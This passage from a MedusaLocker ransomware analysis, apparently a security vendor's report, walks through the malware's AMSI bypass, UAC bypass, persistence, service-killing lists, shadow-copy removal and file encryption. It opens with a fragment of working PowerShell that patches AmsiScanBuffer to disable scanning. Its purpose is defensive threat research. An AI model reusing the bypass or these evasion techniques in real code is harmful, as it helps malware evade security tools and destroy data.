0x80, 0xC3)\n [System.Runtime.InteropServices.Marshal]::Copy(${pATCH}, 0, ${AmsiScanBuffer_Ptr}, 6)\n \n \n--- \n \nFigure 4: Clean PowerShell code for AMSI bypass\n\nThis is an implementation of a known AMSI bypass, [documented here](<https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html>). Specifically the six hex bytes are assembly operation codes (opcodes) that resolve to the code below:\n \n \n B8 57 00 07 80 mov eax, 0x80070057\n C3 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 ret \n \n--- \n \nFigure 5: Assembly code used to implement AMSI bypass\n\nThis small chunk of code replaces the AmsiScanBuffer() function, used by Windows AMSI to start scanning a PowerShell script, to return a hex value that equates to the Windows error of E_INVALIDARG, forcing AMSI to allow execution of the script.\n\nThis code is simply used to set the stage for the payload. Contained within the PowerShell code was a large set of Base64 data which was invoked with the PowerShell command \u201cInvoke-SQLServ -PEBase64\u201d.\n\n# Component: Ransomware Executable\n\nThe primary ransomware executable is run in memory as a fully qualified executable file. This malware performs a large number of system checks to configure itself, and the environment, for persistent execution. \n\nAs overall identification indicators, this ransomware will append each encrypted file with the extension of \u201c.ReadInstructions\u201d and place an HTML ransom note in every folder named \u201cHOW_TO_RECOVER_DATA.html\u201d.\n\nThis section will describe the overall actions taken by the malware and then additional detail for each on how it operates and, at times, why it is unique. One notable item about this ransomware is that it contains multiple debug messages. These are text strings inserted by the malware author to be printed to the screen during testing. Prior to final delivery, the malware author removed the function to print them to the screen. However, the messages remain with the prefix of \u201c[LOCKER]\u201d.\n\nThe malware performs a large amount of steps in its execution, more so than typical ransomware that we analyze. These include:\n\n * Checking for a unique mutex\n * Determining if user has administrative privileges and bypassing UAC\n * Creating a registry key as a marker\n * Creating persistence using a Windows Scheduled Task\n * Terminating and deleting a set of predefined services\n * Terminating a set of predefined processes\n * Removing recovery data\n * Emptying recycle bin\n * Modifying SMB access\n * Creating a list of files and folders to avoid encrypting\n * Iterating through local volumes:\n * Running Windows Restart Manager on each file to unlock it for encryption\n * Encrypting file with AES-256 encryption key\n * Iterating through the local network:\n * Performing an ICMP ping against remote system to check connectivity\n * Connecting via SMB, while avoiding hidden shares\n * Encrypting remote files with the same AES-256 encryption key\n\n### Creating a Mutex\n\nThe malware contains a hard coded mutex of \u201c{8761ABBD-7F85-42EE-B272-A76179687C63}\u201d. This mutex is checked, and set, before any major activity takes place. A mutex is used by applications to register that they are currently running on the system. As any other application can access a mutex, this allows any subsequent execution of the malware to see if it is already running. If so, the new instance will simply terminate.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-6.png>) \n\n\nFigure 6: Code that shows the hardcoded mutex\n\n### Checking administrative privileges\n\nThe malware will next determine if it is running as an administrator privileged account or a regular user. This is done by checking its own execution in memory and seeing what privileges it has.\n\nThis is done using the typical method of opening its own process in memory and determining the user rights used to launch, using GetTokenInformation() as shown below.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-7.png>)\n\nFigure 7: Code that shows the method of checking administrative privileges\n\nIf the executable is not running as administrator, the malware will attempt to relaunch it after disabling UAC. This is done by using a known UAC bypass method, documented below.\n\n### Known UAC bypass method\n\nMedusa Locker implements a known method for bypassing Windows\u2019 User Account Control (UAC), a built-in security measure within Windows that prompts users to manually approve administrative actions. UAC bypasses have been long used for malware to surreptitiously run in the background without user visibility. \n\nThis bypass utilizes the [CMSTP technique](<https://attack.mitre.org/techniques/T1191/>), [discovered years ago](<https://oddvar.moe/2017/08/15/research-on-cmstp-exe/>), that leverages the Windows CMSTPLUA COM interface\u2019s command execution method to run applications.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-8.png>)\n\nFigure 8: Code that shows the implementation of CMSTP UAC bypass\n\n### Creating Marker registry key\n\nThe malware will create a new key in the registry to store its file name, but not path location. This value is stored to: **HKEY_CURRENT_USER\\SOFTWARE\\MDSLK\\Self**. It is not known the importance or usage of this registry key, but it\u2019s an apparent abbreviation of \u201cMeDuSa LocKer\u201d. Similar keys have been used in other malware families as a method of determining if the machine has been compromised in the past or if it\u2019s a new infection. Such markers have also been seen as simple vanity tagging, like graffiti on a wall.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-9.png>)\n\nFigure 9: Code that shows the creation of the marker registry key\n\n### Creating Persistence through Scheduled Tasks\n\nThe malware will create a scheduled task for continued persistence by utilizing the Windows task triggers. This is evidenced by the use of strings in a section of code used for scheduling a hidden task named \u201csvhost\u201d. This will point to a previously established copy of this malware stored in \u201c%AppData%\\Roaming\\svhost.exe\u201d. The values below refer to the \u201cPT\u201d structure, in which scheduled tasks are specified for timed intervals. In the case of this malware, it is set to \u201cPT15M\u201d, which causes it to run every 15 minutes. \n\nNotably, this author used a formal method of creating a scheduled task using documented Windows programming APIs. While other malware use built-in Windows tools like schtasks.exe and at.exe, this author implemented a solution that mimics [Microsoft\u2019s example code](<https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--c--->) almost exactly to create the task. The benefit to this implementation is that it can avoid many forms of behavioral detection that alert on executables running those commands directly.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-10-1.png>)\n\nFigure 10: Code that shows the creation of a scheduled task\n\nThe iteration period of 15 minutes is hard configured in the binary, appearing in execution as the configuration is being built:\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-11-1.png>)\n\nFigure 11: Code that shows the scheduled task timer being written to the malware configuration\n\n### Terminating Services and Processes\n\nUsing a pre-established list of service names and process executables, shown below, the malware will begin to close and remove applications that may impair its ability to encrypt the system. It will start by detecting if a service name matches a predefined list, noted in the figure below. If a service is found, the malware will use Windows API calls to terminate it and delete it. These services relate to many security antivirus and business-related applications. The malware will then iterate through a list of executable file names and, if they are running on the system, terminate them. \n\nThe lists of services and processes are understandable for impairing the system, however it is noteworthy that the lists are almost identical to those used by Lockbit ransomware, with only slight differences such as additional processes.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-12-1.png>)\n\nFigure 12: Code that shows the set of services and processes to be terminated\n\nIn total, these services and processes are noted below:\n\nwrapper\n\n| \n\nCulserver\n\n| \n\nmsmdsrv \n \n---|---|--- \n \nDefWatch\n\n| \n\nRTVscan\n\n| \n\ntomcat6 \n \nccEvtMgr\n\n| \n\nsqlbrowser\n\n| \n\nzhudongfangyu \n \nccSetMgr\n\n| \n\nSQLADHLP\n\n| \n\nSQLADHLP \n \nSavRoam\n\n| \n\nQBIDPService\n\n| \n\nvmware-usbarbitator64 \n \nsqlservr\n\n| \n\nIntuit.QuickBooks.FCS\n\n| \n\nvmware-converter \n \nsqlagent\n\n| \n\nQBCFMonitorService\n\n| \n\ndbsrv12 \n \nsqladhlp\n\n| \n\nsqlwriter\n\n| \n\ndbeng8 \n \nFigure 13: List of services to terminate and delete from the system\n\nwxServer.exe\n\n| \n\nwinword.exe\n\n| \n\ntomcat6.exe \n \n---|---|--- \n \nwxServerView\n\n| \n\nQBW32.exe\n\n| \n\njava.exe \n \nsqlservr.exe\n\n| \n\nQBDBMgr.exe\n\n| \n\n360se.exe \n \nsqlmangr.exe\n\n| \n\nqbupdate.exe\n\n| \n\n360doctor.exe \n \nRAgui.exe\n\n| \n\nQBCFMonitorService.exe\n\n| \n\nwdswfsafe.exe \n \nsupervise.exe\n\n| \n\naxlbridge.exe\n\n| \n\nfdlauncher.exe \n \nCulture.exe\n\n| \n\nQBIDPService.exe\n\n| \n\nfdhost.exe \n \nRTVscan.exe\n\n| \n\nhttpd.exe\n\n| \n\nGDscan.exe \n \nDefwatch.exe\n\n| \n\nfdlauncher.exe\n\n| \n\nZhuDongFangYu.exe \n \nsqlbrowser.exe\n\n| \n\nMsDtSrvr.exe\n\n| \n \nFigure 14: List of processes to terminate if running\n\n### Removing recovery options\n\nAs is typical for most ransomware, Medusa Locker will run a series of Windows commands to alter the system to prevent easy recovery. In this case it uses a combination of \u201cvssadmin\u201d and WMI to remove all volume shadow copies - the built-in file system backups within Windows. It will also use the \u201cbcdedit\u201d command to prevent the system from being rebooted into Recovery Mode.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-15.png>)\n\nFigure 15: Code that shows the execution of system recovery limiting commands \n\n### Emptying the recycle bin\n\nOne of the early operations of the ransomware is to empty all contents of the Windows recycle bin. It is assumed to do this to prevent users from restoring any files that were later encrypted. However, this is a tactic that is uncommon and could just be a sign of how effective and complete the author wanted the destruction to be.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-16.png>)\n\nFigure 16: Code that shows the emptying of the Windows recycle bin \n\n### Modifying SMB connection settings\n\nOne feature of this ransomware is to change access to local SMB folder shares. This is done by changing one within the victim\u2019s registry under SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System. Under this key, the value of EnableLinkedConnections is set to 0, or disabled. This allows network shares to be available for a user under both regular access and admin privileged access. This feature is disabled by this malware.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-17.png>)\n\nFigure 17: Code that shows the modification of the Windows SMB connection settings \n\n### Establish important folders to skip for encryption\n\nDuring the file and folder enumeration process, the malware will determine if a found folder matches a set of known folders, with examples in the code below. \n\nThese appear to ensure that the services like Exchange and SQL Server are kept operational during encryption. Notably, this malware will skip and not encrypt any file, or the contents of any folder, with a \u201c$\u201d in the file or folder name. This may be in an attempt to avoid the effort of encrypting Microsoft [Word temporary backup files](<https://support.microsoft.com/en-us/help/211632/description-of-how-word-creates-temporary-files>) or operating system backup folders like $Windows.~BT.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-18.png>)\n\nFigure 18: Code that shows the criteria of folders to avoid encrypting \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-19.png>)\n\nFigure 19: Further code that shows the criteria of folders to avoid encrypting \n\n### Unlocking files through Windows Restart Manager\n\nOne unique aspect of Medusa Locker is its use of the Windows Restart Manager to ensure each file is accessible for encryption. This is necessary as many applications \u201clock\u201d a file, preventing other applications from writing, or even reading, the contents. Typically, unlocking a file requires identifying the application that has the file open and terminating it. However, Windows has a built-in feature called Restart Manager that assists with that. The malware will use the Restart Manager API calls on each file to encrypt to determine if it is open and, if so, use these API calls to terminate the application. This ensures that as many files are encrypted as possible while performing safe, graceful closure of applications.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-20.png>)\n\nFigure 20: Code that shows the use of Windows Restart Manager to close applications \n\n### File encryption\n\nLike many other ransomware families seen in the wild, Medusa Locker will utilize an embedded public key to perform AES-256 encryption on all file data. This public key is stored as a block of base64 data that represents the binary key shown below. There is no method within this implementation for the victim to decrypt their data without assistance from the ransomware group.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/06/MedusaLocker-Figure-21.png>)\n\nFigure 21: The encryption public key stored as base64 text\n \n \n 0000h: 0602 0000 00a4 0000\u00a0 5253 4131 0008 0000\u00a0 ........RSA1....\n 0010h: 0100 0100 57b3 7812\u00a0 d351 daad 4b60 33f4\u00a0 ....W.x..Q..K`3.\n 0020h: 823f 3659 9214 7248\u00a0 1986 887b 5c29 f027\u00a0 .?6Y..rH...{\\).'\n 0030h: efe7 8fdb 6825 a015\u00a0